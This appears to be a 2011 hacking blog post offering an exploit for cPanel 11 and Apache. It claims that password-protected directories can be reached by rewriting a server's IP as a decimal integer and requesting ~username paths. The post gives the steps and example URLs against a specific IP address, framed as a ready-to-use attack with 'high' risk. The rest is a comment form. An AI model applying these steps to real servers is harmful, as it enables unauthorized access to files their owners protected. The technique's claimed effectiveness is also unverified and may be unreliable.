Cpanel and Apache by-pass protected directory

Posted: March 12, 2011 by Hacking & Relax in Bug, exploit, Tutorial

Software : Cpanel & Apache
Type of vunlnerability : Protected Directory Traversal & Gain Access Files
Tested On : Cpanel 11
Risk of use : High

Discovered by : dinhcaohack
Team Website : http://vniss.net
Exploit
Code:

1. Convert IP: calculate ( (first octet * 2^24) + (second octet *2^16)
+ (third octet * 2^8) + (fourth octet) ).
So we have 65.60.10.2 is 1094453762.
2. Find exact username like : xgroup
3. Access protected directories and files (by .htaccess & .htpasswd) on browser:
http://1094453762/~xgroup/protect/
http://1094453762/~target/protect/index.php
etc.

 

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

w

Connecting to %s